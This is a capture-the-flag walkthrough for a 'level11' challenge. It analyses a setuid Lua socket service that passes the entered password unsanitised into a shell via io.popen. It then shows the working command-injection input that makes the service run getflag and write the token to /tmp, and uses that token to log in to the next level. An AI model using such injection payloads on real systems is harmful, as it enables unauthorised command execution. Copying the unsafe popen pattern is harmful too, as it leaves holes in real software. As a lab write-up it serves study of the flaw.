$ls -l
total 4
-rwsr-sr-x 1 flag11 level11 668 Mar  5  2016 level11.lua

$ps -aux | grep lua
flag11    1832  0.0  0.0   2892   828 ?        S    02:16   0:00 lua /home/user/level11/level11.lua

so we have the lua script running with flag11 right

$cat level11.lua
#!/usr/bin/env lua
local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 5151))

function hash(pass)
  prog = io.popen("echo "..pass.." | sha1sum", "r")
  data = prog:read("*all")
  prog:close()

  data = string.sub(data, 1, 40)

  return data
end


while 1 do
  local client = server:accept()
  client:send("Password: ")
  client:settimeout(60)
  local l, err = client:receive()
  if not err then
      print("trying " .. l)
      local h = hash(l)

      if h ~= "f05d1d066fb246efe0c6f7d095f909a7a0cf34a0" then
          client:send("Erf nope..\n");
      else
          client:send("Gz you dumb*\n")
      end

  end

  client:close()
end


ok so if when we run 
$nc 127.0.0.1 5151
password: blablabla
Erf nope..

so the password we type is passed to the function hash() and then compared with this hash f05d1d066fb246efe0c6f7d095f909a7a0cf34a0
however this hash function will execute our command between quote if passed in the format \"; cmd;\"

$nc 127.0.0.1 5151
pasword : \"; getflag > /tmp/result;\'
Erf nope..

$cat /tmp/result
Check flag.Here is your token : fa6v5ateaw21peobuub8ipe6s

$su level12
password : fa6v5ateaw21peobuub8ipe6s


